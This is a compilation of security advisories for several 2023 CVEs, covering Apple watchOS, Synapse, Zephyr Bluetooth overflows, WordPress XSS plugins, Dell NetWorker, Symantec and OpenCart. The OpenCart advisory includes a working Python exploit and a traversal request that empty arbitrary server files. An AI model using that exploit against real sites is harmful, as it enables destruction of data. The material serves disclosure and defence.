A permissions issue was addressed with improved validation. This issue is fixed in tvOS 17, iOS 17 and iPadOS 17, watchOS 10, macOS Sonoma 14. An app may be able to access sensitive user data.

Released September 18, 2023

**App Store**

Available for: Apple Watch Series 4 and later

Impact: A remote attacker may be able to break out of Web Content sandbox

Description: The issue was addressed with improved handling of protocols.

CVE-2023-40448: w0wbox

**Apple Neural Engine**

Available for devices with Apple Neural Engine: Apple Watch Series 9 and Apple Watch Ultra 2

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-40432: Mohamed GHANNAM (@\_simo36)

CVE-2023-41174: Mohamed GHANNAM (@\_simo36)

CVE-2023-40409: Ye Zhang (@VAR10CK) of Baidu Security

CVE-2023-40412: Mohamed GHANNAM (@\_simo36)

**Apple Neural Engine**

Available for devices with Apple Neural Engine: Apple Watch Series 9 and Apple Watch Ultra 2

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use-after-free issue was addressed with improved memory management.

CVE-2023-41071: Mohamed GHANNAM (@\_simo36)

**Apple Neural Engine**

Available for devices with Apple Neural Engine: Apple Watch Series 9 and Apple Watch Ultra 2

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2023-40399: Mohamed GHANNAM (@\_simo36)

**Apple Neural Engine**

Available for devices with Apple Neural Engine: Apple Watch Series 9 and Apple Watch Ultra 2

Impact: An app may be able to disclose kernel memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-40410: Tim Michaud (@TimGMichaud) of Moveworks.ai

**AuthKit**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to access user-sensitive data

Description: The issue was addressed with improved handling of caches.

CVE-2023-32361: Csaba Fitzl (@theevilbit) of Offensive Security

**Bluetooth**

Available for: Apple Watch Series 4 and later

Impact: An attacker in physical proximity can cause a limited out of bounds write

Description: The issue was addressed with improved checks.

CVE-2023-35984: zer0k

**bootp**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to read sensitive location information

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-41065: Adam M., and Noah Roskin-Frazee and Professor Jason Lau (ZeroClicks.ai Lab)

**CFNetwork**

Available for: Apple Watch Series 4 and later

Impact: An app may fail to enforce App Transport Security

Description: The issue was addressed with improved handling of protocols.

CVE-2023-38596: Will Brattain at Trail of Bits

**CoreAnimation**

Available for: Apple Watch Series 4 and later

Impact: Processing web content may lead to a denial-of-service

Description: The issue was addressed with improved memory handling.

CVE-2023-40420: 이준성(Junsung Lee) of Cross Republic

**Dev Tools**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to gain elevated privileges

Description: This issue was addressed with improved checks.

CVE-2023-32396: Mickey Jin (@patch1t)

**Game Center**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to access contacts

Description: The issue was addressed with improved handling of caches.

CVE-2023-40395: Csaba Fitzl (@theevilbit) of Offensive Security

**Kernel**

Available for: Apple Watch Series 4 and later

Impact: An attacker that has already achieved kernel code execution may be able to bypass kernel memory mitigations

Description: The issue was addressed with improved memory handling.

CVE-2023-41981: Linus Henze of Pinauten GmbH (pinauten.de)

**Kernel**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-41984: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd.

**Kernel**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to access sensitive user data

Description: A permissions issue was addressed with improved validation.

CVE-2023-40429: Michael (Biscuit) Thomas and 张师傅(@京东蓝军)

**libpcap**

Available for: Apple Watch Series 4 and later

Impact: A remote user may cause an unexpected app termination or arbitrary code execution

Description: This issue was addressed with improved checks.

CVE-2023-40400: Sei K.

**libxpc**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to delete files for which it does not have permission

Description: A permissions issue was addressed with additional restrictions.

CVE-2023-40454: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab (xlab.tencent.com)

**libxpc**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to access protected user data

Description: An authorization issue was addressed with improved state management.

CVE-2023-41073: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab (xlab.tencent.com)

**libxslt**

Available for: Apple Watch Series 4 and later

Impact: Processing web content may disclose sensitive information

Description: The issue was addressed with improved memory handling.

CVE-2023-40403: Dohyun Lee (@l33d0hyun) of PK Security

**Maps**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to read sensitive location information

Description: The issue was addressed with improved handling of caches.

CVE-2023-40427: Adam M., and Wojciech Regula of SecuRing (wojciechregula.blog)

**MobileStorageMounter**

Available for: Apple Watch Series 4 and later

Impact: A user may be able to elevate privileges

Description: An access issue was addressed with improved access restrictions.

CVE-2023-41068: Mickey Jin (@patch1t)

**Passcode**

Available for: Apple Watch Ultra (all models)

Impact: An Apple Watch Ultra may not lock when using the Depth app

Description: An authentication issue was addressed with improved state management.

CVE-2023-40418: serkan Gurbuz

**Photos Storage**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to access edited photos saved to a temporary directory

Description: The issue was addressed with improved checks.

CVE-2023-40456: Kirin (@Pwnrin)

CVE-2023-40520: Kirin (@Pwnrin)

**Safari**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to identify what other apps a user has installed

Description: The issue was addressed with improved checks.

CVE-2023-35990: Adriatik Raci of Sentry Cybersecurity

**Safari**

Available for: Apple Watch Series 4 and later

Impact: Visiting a website that frames malicious content may lead to UI spoofing

Description: A window management issue was addressed with improved state management.

CVE-2023-40417: Narendra Bhati From Suma Soft Pvt. Ltd.

**Sandbox**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to overwrite arbitrary files

Description: The issue was addressed with improved bounds checks.

CVE-2023-40452: Yiğit Can YILMAZ (@yilmazcanyigit)

**Share Sheet**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to access sensitive data logged when a user shares a link

Description: A logic issue was addressed with improved checks.

CVE-2023-41070: Kirin (@Pwnrin)

**Simulator**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to gain elevated privileges

Description: The issue was addressed with improved checks.

CVE-2023-40419: Arsenii Kostromin (0x3c3e)

**StorageKit**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to read arbitrary files

Description: This issue was addressed with improved validation of symlinks.

CVE-2023-41968: Mickey Jin (@patch1t) and James Hutchins

**TCC**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to access user-sensitive data

Description: The issue was addressed with improved checks.

CVE-2023-40424: Arsenii Kostromin (0x3c3e), Joshua Jewett (@JoshJewett33), and Csaba Fitzl (@theevilbit) of Offensive Security

**WebKit**

Available for: Apple Watch Series 4 and later

Impact: Processing web content may lead to arbitrary code execution

Description: A use-after-free issue was addressed with improved memory management.

WebKit Bugzilla: 249451  
CVE-2023-39434: Francisco Alonso (@revskills), and Dohyun Lee (@l33d0hyun) of PK Security

**WebKit**

Available for: Apple Watch Series 4 and later

Impact: Processing web content may lead to arbitrary code execution

Description: The issue was addressed with improved checks.

WebKit Bugzilla: 256551  
CVE-2023-41074: 이준성(Junsung Lee) of Cross Republic and me Li

**WebKit**

Available for: Apple Watch Series 4 and later

Impact: Processing web content may lead to arbitrary code execution

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 239758  
CVE-2023-35074: Abysslab Dong Jun Kim(@smlijun) and Jong Seong Kim(@nevul37)

CVE-2023-40429: About the security content of watchOS 10

Synapse is an open-source Matrix homeserver written and maintained by the Matrix.org Foundation. When users update their passwords, the new credentials may be briefly held in the server database. While this doesn't grant the server any added capabilities—it already learns the users' passwords as part of the authentication process—it does disrupt the expectation that passwords won't be stored in the database. As a result, these passwords could inadvertently be captured in database backups for a longer duration. These temporarily stored passwords are automatically erased after a 48-hour window. This issue has been addressed in version 1.93.0. Users are advised to upgrade. There are no known workarounds for this issue.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2023-41335: Avoid temporary storage of sensitive information. by clokep · Pull Request #16272 · matrix-org/synapse

A permissions issue was addressed with improved redaction of sensitive information. This issue is fixed in tvOS 17, iOS 17 and iPadOS 17, macOS Sonoma 14. An app may be able to read sensitive location information.

CVE-2023-40384: About the security content of iOS 17 and iPadOS 17

Potential buffer overflow vulnerabilities n the Zephyr Bluetooth subsystem.




**Summary**

I spotted a few buffer overflow vulnerabilities at the following locations in the Zephyr Bluetooth subsystem source code:  
https://github.com/zephyrproject-rtos/zephyr/blob/main/subsys/bluetooth/audio/tbs.c  
https://github.com/zephyrproject-rtos/zephyr/blob/main/subsys/bluetooth/audio/shell/mcc.c  
https://github.com/zephyrproject-rtos/zephyr/blob/main/subsys/bluetooth/audio/shell/media\_controller.c  
https://github.com/zephyrproject-rtos/zephyr/blob/main/subsys/bluetooth/host/conn.c  
https://github.com/zephyrproject-rtos/zephyr/blob/main/subsys/bluetooth/mesh/beacon.c  
https://github.com/zephyrproject-rtos/zephyr/blob/main/subsys/bluetooth/mesh/prov\_device.c  
https://github.com/zephyrproject-rtos/zephyr/blob/main/subsys/bluetooth/mesh/provisioner.c  
https://github.com/zephyrproject-rtos/zephyr/blob/main/subsys/bluetooth/mesh/shell/rpr.c

**Details**

Static buffer overflows in /subsys/bluetooth/audio/tbs.c:

int bt\_tbs\_remote\_incoming(uint8\_t bearer\_index, const char \*to,
			   const char \*from, const char \*friendly\_name)
{
	struct tbs\_service\_inst \*inst;
	struct bt\_tbs\_call \*call \= NULL;
	size\_t local\_uri\_ind\_len;
	size\_t remote\_uri\_ind\_len;
	size\_t friend\_name\_ind\_len;
...
	inst \= &svc\_insts\[bearer\_index\];
...
	if (friendly\_name) {
		inst\->friendly\_name.call\_index \= call\->index;
		(void)strcpy(inst\->friendly\_name.uri, friendly\_name); /\* VULN \*/
		friend\_name\_ind\_len \= strlen(from) + 1;
...
	if (IS\_ENABLED(CONFIG\_BT\_GTBS)) {
...
		if (friendly\_name) {
			gtbs\_inst.friendly\_name.call\_index \= call\->index;
			(void)strcpy(gtbs\_inst.friendly\_name.uri, friendly\_name); /\* VULN \*/
			friend\_name\_ind\_len \= strlen(from) + 1;
...

Stack-based buffer overflow in /subsys/bluetooth/audio/shell/mcc.c:

#ifdef CONFIG\_BT\_MCC\_OTS
static int cmd\_mcc\_send\_search\_raw(const struct shell \*sh, size\_t argc,
				   char \*argv\[\])
{
	int result;
	struct mpl\_search search;

	search.len \= strlen(argv\[1\]);
	memcpy(search.search, argv\[1\], search.len); /\* VULN \*/
	LOG\_DBG("Search string: %s", argv\[1\]);

	result \= bt\_mcc\_send\_search(default\_conn, &search);
	if (result) {
		shell\_print(sh, "Fail: %d", result);
	}
	return result;
}

Stack-based buffer overflow in /subsys/bluetooth/audio/shell/media\_controller.c:

#ifdef CONFIG\_BT\_OTS
static int cmd\_media\_set\_search(const struct shell \*sh, size\_t argc, char \*argv\[\])
{
	/\* TODO: Currently takes the raw search as input - add parameters
	 \* and build the search item here
	 \*/

	struct mpl\_search search;
	int err;

	search.len \= strlen(argv\[1\]);
	memcpy(search.search, argv\[1\], search.len); /\* VULN \*/
	LOG\_DBG("Search string: %s", argv\[1\]);

	err \= media\_proxy\_ctrl\_send\_search(current\_player, &search);
	if (err) {
		shell\_error(ctx\_shell, "Search send failed (%d)", err);
	}

	return err;
}

Heap-based buffer overflow in /subsys/bluetooth/host/conn.c:

#if defined(CONFIG\_BT\_SMP)
...
int bt\_conn\_le\_start\_encryption(struct bt\_conn \*conn, uint8\_t rand\[8\],
				uint8\_t ediv\[2\], const uint8\_t \*ltk, size\_t len)
{
	struct bt\_hci\_cp\_le\_start\_encryption \*cp;
	struct net\_buf \*buf;

	buf \= bt\_hci\_cmd\_create(BT\_HCI\_OP\_LE\_START\_ENCRYPTION, sizeof(\*cp));
	if (!buf) {
		return \-ENOBUFS;
	}

	cp \= net\_buf\_add(buf, sizeof(\*cp));
	cp\->handle \= sys\_cpu\_to\_le16(conn\->handle);
	memcpy(&cp\->rand, rand, sizeof(cp\->rand));
	memcpy(&cp\->ediv, ediv, sizeof(cp\->ediv));

	memcpy(cp\->ltk, ltk, len); /\* VULN \*/
	if (len < sizeof(cp\->ltk)) {
		(void)memset(cp\->ltk + len, 0, sizeof(cp\->ltk) \- len);
	}

	return bt\_hci\_cmd\_send\_sync(BT\_HCI\_OP\_LE\_START\_ENCRYPTION, buf, NULL);
}

Ineffective size check due to assert and buffer overflow in /subsys/bluetooth/mesh/beacon.c:

void bt\_mesh\_beacon\_priv\_random\_get(uint8\_t \*random, size\_t size)
{
	\_\_ASSERT(size <= sizeof(priv\_random.val), "Invalid random value size %u", size);
	memcpy(random, priv\_random.val, size); /\* VULN \*/
}

Static buffer overflow in /subsys/bluetooth/mesh/prov\_device.c (conf\_size could be 32 and not 16):

static void prov\_confirm(const uint8\_t \*data)
{
	uint8\_t conf\_size \= bt\_mesh\_prov\_auth\_size\_get();

	LOG\_DBG("Remote Confirm: %s", bt\_hex(data, conf\_size));

	memcpy(bt\_mesh\_prov\_link.conf, data, conf\_size); /\* VULN \*/
	notify\_input\_complete();

	send\_confirm();
}

Static buffer overflow in /subsys/bluetooth/mesh/provisioner.c (conf\_size could be 32 and not 16):

static void prov\_confirm(const uint8\_t \*data)
{
	uint8\_t conf\_size \= bt\_mesh\_prov\_auth\_size\_get();

	LOG\_DBG("Remote Confirm: %s", bt\_hex(data, conf\_size));

	if (!memcmp(data, bt\_mesh\_prov\_link.conf, conf\_size)) {
		LOG\_ERR("Confirm value is identical to ours, rejecting.");
		prov\_fail(PROV\_ERR\_CFM\_FAILED);
		return;
	}

	memcpy(bt\_mesh\_prov\_link.conf, data, conf\_size); /\* VULN \*/

	send\_random();
}

Stack-based buffer overflow in /subsys/bluetooth/mesh/shell/rpr.c:

static void rpr\_scan\_report(struct bt\_mesh\_rpr\_cli \*cli,
			    const struct bt\_mesh\_rpr\_node \*srv,
			    struct bt\_mesh\_rpr\_unprov \*unprov,
			    struct net\_buf\_simple \*adv\_data)
{
	char uuid\_hex\_str\[32 + 1\];

	bin2hex(unprov\->uuid, 16, uuid\_hex\_str, sizeof(uuid\_hex\_str));

	shell\_print(bt\_mesh\_shell\_ctx\_shell,
		    "Server 0x%04x:\\n"
		    "\\tuuid:   %s\\n"
		    "\\tOOB:    0x%04x",
		    srv\->addr, uuid\_hex\_str, unprov\->oob);

	while (adv\_data && adv\_data\->len \> 2) {
		uint8\_t len, type;
		uint8\_t data\[31\];

		len \= net\_buf\_simple\_pull\_u8(adv\_data) \- 1;
		type \= net\_buf\_simple\_pull\_u8(adv\_data);
		memcpy(data, net\_buf\_simple\_pull\_mem(adv\_data, len), len); /\* VULN \*/
		data\[len\] \= '\\0';

		if (type \== BT\_DATA\_URI) {
			shell\_print(bt\_mesh\_shell\_ctx\_shell, "\\tURI:    \\"\\\\x%02x%s\\"",
				    data\[0\], &data\[1\]);
		} else if (type \== BT\_DATA\_NAME\_COMPLETE) {
			shell\_print(bt\_mesh\_shell\_ctx\_shell, "\\tName:   \\"%s\\"", data);
		} else {
			char string\[64 + 1\];

			bin2hex(data, len, string, sizeof(string));
			shell\_print(bt\_mesh\_shell\_ctx\_shell, "\\t0x%02x:  %s", type, string);
		}
	}
}

**PoC**

I haven't tried to reproduce these potential vulnerabilities against a live install of the Zephyr OS.

**Impact**

If the unchecked inputs above are attacker-controlled and cross a security boundary, the impact of the buffer overflow vulnerabilities could range from denial of service to arbitrary code execution.

**Patches**

This has been fixed in:

*   main: #60465

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in zephyr
*   Email us at Zephyr-vulnerabilities

embargo: 2023-08-19

CVE-2023-4264: Buffer overflow vulnerabilities in the Zephyr Bluetooth subsystem

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Ankit Agarwal, Priyanshu Mittal Easy Coming Soon plugin <= 2.3 versions.

**Solution**

 No fix

No patched version is available. No reply from the vendor.

Found this useful? Thank Rio Darmawan for reporting this vulnerability. Buy a coffee ☕

Rio Darmawan discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Easy Coming Soon Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**Other vulnerabilities in this plugin**

 1 present

 2 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-25483: WordPress Easy Coming Soon plugin <= 2.3 - Cross Site Scripting (XSS) vulnerability - Patchstack


Dell NetWorker, Version 19.7 has an improper authorization vulnerability in the NetWorker client. An unauthenticated attacker within the same network could potentially exploit this by manipulating a command leading to gain of complete access to the server file further resulting in information leaks, denial of service, and arbitrary code execution. Dell recommends customers to upgrade at the earliest opportunity.



**Impact**

High

**Details**

Proprietary Code CVEs

Description

CVSS Base Score

CVSS Vector String

CVE-2023-28055

Dell NetWorker, Version 19.7 has an improper authorization vulnerability in the NetWorker client. An unauthenticated attacker within the same network could potentially exploit this by manipulating a command leading to gain of complete access to the server file further resulting in information leaks, denial of service, and arbitrary code execution. Dell recommends customers to upgrade at the earliest opportunity.

8.8

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Proprietary Code CVEs

Description

CVSS Base Score

CVSS Vector String

CVE-2023-28055

Dell NetWorker, Version 19.7 has an improper authorization vulnerability in the NetWorker client. An unauthenticated attacker within the same network could potentially exploit this by manipulating a command leading to gain of complete access to the server file further resulting in information leaks, denial of service, and arbitrary code execution. Dell recommends customers to upgrade at the earliest opportunity.

8.8

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Dell Technologies recommends all customers consider both the CVSS base score and any relevant temporal and environmental scores that may impact the potential severity associated with a particular security vulnerability.

**Affected Products and Remediation**

CVEs Addressed

Product

Software/Firmware

Affected Versions

Remediated Versions

Link

CVE-2023-28055

Dell NetWorker

Dell NetWorker NW Client

Versions 19.9, 19.9.0.1

Versions 19.9.0.2

https://www.dell.com/support/home/product-support/product/networker/drivers

CVE-2023-28055

Dell NetWorker

Dell NetWorker NW Client

Versions 19.8  
through 19.8.0.2

Versions 19.8.0.3

https://www.dell.com/support/home/product-support/product/networker/drivers

CVE-2023-28055

Dell NetWorker

Dell NetWorker NW Client

Versions 19.7 through 19.7.0.4

Versions 19.7.0.5

https://www.dell.com/support/home/product-support/product/networker/drivers

CVE-2023-28055

Dell NetWorker

Dell NetWorker NW Client

Version 19.7.1

Versions 19.9.0.2

https://www.dell.com/support/home/product-support/product/networker/drivers

CVEs Addressed

Product

Software/Firmware

Affected Versions

Remediated Versions

Link

CVE-2023-28055

Dell NetWorker

Dell NetWorker NW Client

Versions 19.9, 19.9.0.1

Versions 19.9.0.2

https://www.dell.com/support/home/product-support/product/networker/drivers

CVE-2023-28055

Dell NetWorker

Dell NetWorker NW Client

Versions 19.8  
through 19.8.0.2

Versions 19.8.0.3

https://www.dell.com/support/home/product-support/product/networker/drivers

CVE-2023-28055

Dell NetWorker

Dell NetWorker NW Client

Versions 19.7 through 19.7.0.4

Versions 19.7.0.5

https://www.dell.com/support/home/product-support/product/networker/drivers

CVE-2023-28055

Dell NetWorker

Dell NetWorker NW Client

Version 19.7.1

Versions 19.9.0.2

https://www.dell.com/support/home/product-support/product/networker/drivers

**Revision History**

**Revision**

**Date**

**Description**

1.0

2023-09-26

Initial Release

2.0

2023-09-27

Added Point 4 Under "Additional Info" Section

**Related Information**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

**Additional Information**

1.  Platforms: Windows & Linux (All variants and flavors are impacted)
2.  Impacted Components: Dell NetWorker NW Client
3.  Since the capability to modify server files remotely was added in 19.7, this vulnerability is not applicable to Versions prior to 19.7.
4.  Dell recommends that you always upgrade to the latest release/version for your product

NetWorker Family, NetWorker, NetWorker Series, NetWorker Module, Product Security Information

CVE-2023-28055: DSA-2023-294: Security update for Dell NetWorker NW Client vulnerabilities

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Cornel Raiu WP Search Analytics plugin <= 1.4.7 versions.

**Solution**

 Fixed

Update the WordPress WP Search Analytics plugin to the latest available version (at least 1.4.8).

LEE SE HYOUNG (hackintoanetwork) discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress WP Search Analytics Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 1.4.8.

**Other vulnerabilities in this plugin**

 0 present

 2 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-30471: WordPress WP Search Analytics plugin <= 1.4.7 - Reflected Cross Site Scripting (XSS) vulnerability - Patchstack

Symantec Protection Engine, prior to 9.1.0, may be susceptible to a Hash Leak vulnerability.



Symantec Protection Engine Security Update

**Summary**

Symantec, A Division of Broadcom has released updates to address an issue that was discovered in the Symantec Protection Engine (SPE) product.

This issue is only applicable to the legacy web console for SPE. 

**Affected Product(s)**

****

**Issue Details**

 **CVE-2023-23958**

 **Severity/CVSSv3:**

 Medium / 6.8 AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

 **References:**

 **Impact:**

 NVD: CVE-2023-23958

 Hash Leak Vulnerability

 **Description:**

Symantec Protection Engine, prior to 9.1.0, may be susceptible to a hash leak vulnerability, where sensitive information may be exposted to an actor that is not explicity authorized to have access to that information.

**Mitigation & Additional Information**

Symantec Protection Engine 9.1.0 has been made available to address this issue and can be downloaded via the Software Download Portal. Additional mitigation options are available at Symantec Protection Engine is affected by CVE-2023-23958.

Symantec recommends the following measures to reduce risk of attack:

*   Use the new Symantec Protection Engine centralized console.
*   Restrict access to administrative or management systems to authorized privileged users.
*   Restrict remote access to trusted/authorized systems only.
*   Run under the principle of least privilege, where possible, to limit the impact of potential exploit.
*   Keep all operating systems and applications current with vendor patches.
*   Follow a multi-layered approach to security. At a minimum, run both firewall and anti-malware applications to provide multiple points of detection and protection for both inbound and outbound threats.
*   Deploy network and host-based intrusion detection systems to monitor network traffic for signs of anomalous or suspicious activity. This may aid in the detection of attacks or malicious activity related to the exploitation of latent vulnerabilities.

**Acknowledgements**

*   _CVE-2023-23958: Michal Bogdanowicz and Lukasz Bialek, NORDEA BANK ABP_

CVE-2023-23958: Support Content Notification - Support Portal - Broadcom support portal

Path Traversal in OpenCart versions 4.0.0.0 to 4.0.2.2 allows an authenticated user with access/modify privilege on the Log component to empty out arbitrary files on the server

**Summary:**

**Product**

OpenCart

**Vendor**

OpenCart

**Severity**

High - Adversaries may exploit software vulnerabilities to empty any file on the server with write permissions.

**Affected Versions**

4.0.0.0 - 4.0.2.2

**Tested Version(s)**

4.0.2.2

**CVE Identifier**

CVE-2023-2315

**CVE Description**

Path traversal in Opencart versions 4.0.0.0 to 4.0.2.2 allows authenticated backend users to empty any existing file on the server with write permissions.

**CWE Classification(s)**

CWE-27 - Path Traversal: ‘dir/../../filename’

**CAPEC Classification(s)**

CAPEC-126 - Path Traversal

**CVSS3.1 Scoring System:**

**Base Score:** 8.1 (High)  
**Vector String:** CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

**Metric**

**Value**

**Attack Vector (AV)**

Network

**Attack Complexity (AC)**

Low

**Privileges Required (PR)**

Low

**User Interaction (UI)**

None

**Scope (S)**

Unchanged

**Confidentiality (C)**

None

**Integrity (I)**

High

**Availability (A)**

High

**Product Overview:**

Opencart is an open source ecommerce platform for online merchants to self-host and list their products for sale. It is structured in a way that allows for a quick setup and Opencart also provides a cloud solution for users who do not want to have an on-premise setup. Opencart is split into two fronts: a storefront containing a catalogue that regular users will access, as well as a backend administrative dashboard for management purposes. Account roles for the backend dashboard are highly customizable, allowing the owner of the website to initialise custom roles with different privileges and access, by using the fine-grained controls.

**Vulnerability Summary:**

There is a path traversal vulnerability at the Logs section of the backend dashboard, which allows an authenticated adversary to empty any existing file on the web server, given that there is write permissions on the file. By default, every OpenCart file is able to be emptied. This means that the availability of the website will be heavily impacted by emptying the core files, preventing regular functionality of the website. This vulnerability was introduced from versions 4.0.0.0 onward and patched in version 4.0.2.3.

**Vulnerability Details:**

A backend user with “access” and “modify” permissions on the “tool/log” setting is able to clear the logs of the website. When clearing the logs in a regular use case, a HTTP GET request is sent to delete the file “error.log”, by specifying it in the filename query parameter. The relevant code that is vulnerable can be found below:

    // /admin/controller/tool/log.php
    
    public function clear(): void {
    
        if (isset($this->request->get['filename'])) {
            $filename = (string)$this->request->get['filename']; // [1]
        } else {
            $filename = '';
        }
    
        $json = [];
    
        if (!$this->user->hasPermission('modify', 'tool/log')) {
            $json['error'] = $this->language->get('error_permission');
        }
    
        // DIR_LOGS = /system/storage/logs/
        $file = DIR_LOGS . $filename; // [2]
    
        if (!is_file($file)) {
            $json['error'] = sprintf($this->language->get('error_file'), $filename);
        }
    
        if (!$json) {
            $handle = fopen($file, 'w+'); // [3]
            fclose($handle);
            $json['success'] = $this->language->get('text_success');
        }
        // ...
    }
    

At [1], the filename is obtained from the incoming HTTP GET request and stored into the $filename PHP variable without any form of input sanitisation. At [2], the file name is appended to the back of the storage log path /system/storage/logs/ and stored into another variable $file. At [3], the $file variable is used in a fopen() function call with the mode set to w+. This means that the existing file will have its content emptied. Since a file existence check occurs before this, it is not possible to create files that do not already exist.

In a normal scenario, the file /system/storage/logs/error.log will be emptied after the GET request is sent. However, since there is a lack of input sanitisation, it is possible for the filename query parameter to contain any number of path traversal sequence (../) to traverse out of the intended directory and point to other files instead. This results in other files being emptied and permanently affecting the website’s functionality.

**Exploit Conditions:**

This vulnerability can be exploited when the attacker has a set of valid credentials to the backend dashboard with access and modify permissions on tool/log.

**Proof-of-Concept:**

We have tried our best to make the PoC as portable as possible. This report includes a functional exploit written in Python3 that exploits the Path Traversal vulnerability.

The vulnerability can be exploited by sending a GET request to https://TARGET_HOST/admin/index.php?route=tool/log.clear&user_token=<USER_TOKEN>&filename=../../../../../../tmp/PoC.txt, for example:

    GET /admin/index.php?route=tool/log.clear&filename=../../../../../../tmp/PoC.txt&user_token=4d6d604d8862798e96fe91846f28a36f HTTP/1.1
    Host: TARGET_HOST
    Cookie: OCSESSID=4f09deedf4a82f9c5b4bee9ec3;
    

Before running the exploit below, please ensure that you create a non-empty file /tmp/PoC.txt and that it has write permissions for the web user:

    $ echo "Hello" > /tmp/PoC.txt
    $ chmod 777 /tmp/PoC.txt 
    $ ls -la /tmp/PoC.txt
    -rwxrwxrwx 1 root root 6 Apr 26 09:36 /tmp/PoC.txt
    

Then, run the exploit below:

    # Opencart v4.0.0.0 - v4.0.2.2 path traversal arbitrary file emptying (CVE-2023-2315)
    # Author: Poh Jia Hao (STAR Labs SG Pte. Ltd.)
    
    #!/usr/bin/env python3
    import re
    import requests
    import sys
    requests.packages.urllib3.disable_warnings()
    
    s = requests.Session()
    
    def check_args():
        global target, username, password
    
        print("\n======= Opencart v4.0.0.0 - v4.0.2.2 path traversal arbitrary file emptying (CVE-2023-2315) =======")
        print("Please ensure that a file /tmp/PoC.txt with write permissions has been created on the target server with non-empty content!\n")
    
        if len(sys.argv) != 4:
            print("[!] Please enter the required arguments like so: python3 {} http://TARGET_URL/ADMIN_PATH/ USERNAME PASSWORD".format(sys.argv[0]))
            sys.exit(1)
    
        target = sys.argv[1].strip("/")
        username = sys.argv[2]
        password = sys.argv[3]
    
    def authenticate():
        global user_token
    
        print("[+] Attempting to authenticate...")
    
        # Get login_token
        path = f"{target}/index.php"
        res = s.get(path)
        login_token = re.findall("login_token=(.+)\" method", res.text)[0]
        
        # Perform login and get user_token
        data = {
            "username": username,
            "password": password
        }
        path = f"{target}/index.php?route=common/login.login&login_token={login_token}"
        res = s.post(path, data=data)
        user_token = re.findall("user_token=(.+)\"", res.text)[0]
    
        if not user_token:
            print("[!] Failed to authenticate! Are the credentials correct?")
            sys.exit(1)
    
        print("[+] Authenticated successfully.")
    
    def delete():
    
        print("[+] Attempting to empty /tmp/PoC.txt...")
    
        # Empty /tmp/PoC.txt
        path = f"{target}/index.php?route=tool/log.clear&filename=../../../../../../tmp/PoC.txt&user_token={user_token}"
        res = s.get(path)
        print(f"[+] Output: {res.text}")
    
    def main():
        check_args()
        authenticate()
        delete()
    
    if __name__ == "__main__":
        main()
    

**Suggested Mitigations:**

OpenCart released version 4.0.2.3 that patches this vulnerability. It is recommended to upgrade to the latest version of OpenCart.

**Detection Guidance:**

It is possible to detect the exploitation of this vulnerability by checking the server’s access logs for all GET requests made to /admin/index.php?route=tool/log.clear, and filtering for requests that contain ../ in the filename query parameter.

**Credits:**

Poh Jia Hao (@Chocologicall) of STAR Labs SG Pte. Ltd. (@starlabs\_sg)

**Timeline:**

*   2022-09-06 Followed the security bug reporting instructions and created an OpenCart forum account to try to report to the administrators, but new accounts are unable to send private messages.
*   2022-09-11 Email sent to [email protected] in an attempt to establish a proper communication channel with the project owner/maintainers.
*   2022-09-12 Support agent replied and suggested to describe the issue in a public channel via their GitHub Issues tracker, to which we reminded that it is a security bug on the latest version. Support agent then requested to send them the report where they will forward it to the developers. We instead requested for the public key of the developers so that the report can be encrypted to prevent information leakage. Support agent replied “they do not have such”.
*   2022-09-14 Tried the “Contact Us” form on OpenCart’s website. Ended up with a second support ticket being opened.
